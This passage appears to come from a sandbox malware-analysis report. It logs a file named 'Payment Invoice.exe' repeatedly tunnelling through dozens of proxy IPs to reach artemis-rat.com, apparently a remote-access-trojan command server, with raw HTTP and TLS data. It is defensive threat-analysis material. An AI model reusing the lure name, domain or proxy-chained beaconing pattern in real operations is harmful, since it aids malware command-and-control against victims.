                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                554192.168.2.45156565.1.244.23210807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.702606916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.092586040 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                555192.168.2.45161272.10.164.17814037076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.702812910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.575042009 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                556192.168.2.45126064.227.108.25319087076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.710556030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                557192.168.2.451516114.255.132.6031287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.716793060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.620605946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.389205933 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                558192.168.2.451720172.64.86.217807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.718957901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.873189926 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                559192.168.2.451557128.199.196.31388327076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.719468117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.620558023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                560192.168.2.451732104.19.85.214807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.720230103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.874094009 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                561192.168.2.451675201.77.108.1969997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.724076986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.089764118 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                562192.168.2.451746104.21.66.184807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.725653887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.880162954 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                563192.168.2.45111645.11.95.16660087076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.726648092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.727063894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.786211967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.841651917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:40.886420965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:52.979886055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:05.089258909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:29.089248896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:17.166104078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                564192.168.2.451748185.162.228.48807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.727605104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.882023096 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                565192.168.2.45119692.204.135.37629697076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.730715990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.823590040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                566192.168.2.451582202.179.184.4454307076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.735893965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                567192.168.2.45159858.75.126.23541457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.788511992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                568192.168.2.45161472.210.221.22341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.788626909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                569192.168.2.45178250.63.12.33147387076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.788790941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.276834011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.870265961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.054218054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.241947889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.379081011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.589468956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.804851055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.153253078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                570192.168.2.451824172.67.181.89807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.789294004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.943694115 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                571192.168.2.450165192.252.211.197149217076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.789397001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                572192.168.2.45163654.248.238.110807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.789458990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.055772066 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0
                                                                Mar 11, 2024 16:15:17.056245089 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ef 20 03 d8 37 e4 c3 a7 70 71 57 a8 ef 35 81 64 9e 9c cc db 94 0b df b6 1f 53 23 68 c8 c6 52 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: lhe 7pqW5dS#hR*,+0/$#('=<5/artemis-rat.com#&W!Jx%uFPIF ^g2.LN7C'.'2$L}KoBFF
                                                                Mar 11, 2024 16:15:17.322336912 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 98 49 11 e9 7b 38 c8 3f 75 64 b6 d3 c4 b3 52 0c 9c 4a 4f a4 ce 0a 39 2d 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                Data Ascii: =9I{8?udRJO9-DOWNGRD0000*H010Uartemis-rat.com0240311151251Z260311151251Z010Uartemis-rat.com0"0*H0c XY
                                                                Mar 11, 2024 16:15:17.325134039 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 63 80 d6 ec 8e 77 bd 44 91 8d fd 6a 38 62 b7 ea d0 4c cb 51 47 a7 a6 2a c2 cd 19 cf c4 68 57 18 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 67 b4 f3 85 22 30 dd 38 1f 7b 8a e9 cb f2 f4 04 81 46 61 f3 76
                                                                Data Ascii: %! cwDj8bLQG*hW(g"08{Favb_v5^=s
                                                                Mar 11, 2024 16:15:17.589824915 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 ab 50 7a 13 cd 94 9a df 46 80 9f be da f4 84 b9 47 c3 a4 15 05 22 b3 63 0d 0d f8 33 86 96 23 24 75 5e 1a bd c7 dd 1a 6d
                                                                Data Ascii: (PzFG"c3#$u^m


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                573192.168.2.45168472.10.160.17210877076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.790221930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                574192.168.2.451605154.12.178.107299857076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.790710926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                575192.168.2.45117946.231.72.3556787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.790802002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                576192.168.2.451613152.32.130.117180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.790925026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                577192.168.2.45161572.195.34.4141457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.790944099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                578192.168.2.451749204.236.176.61807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
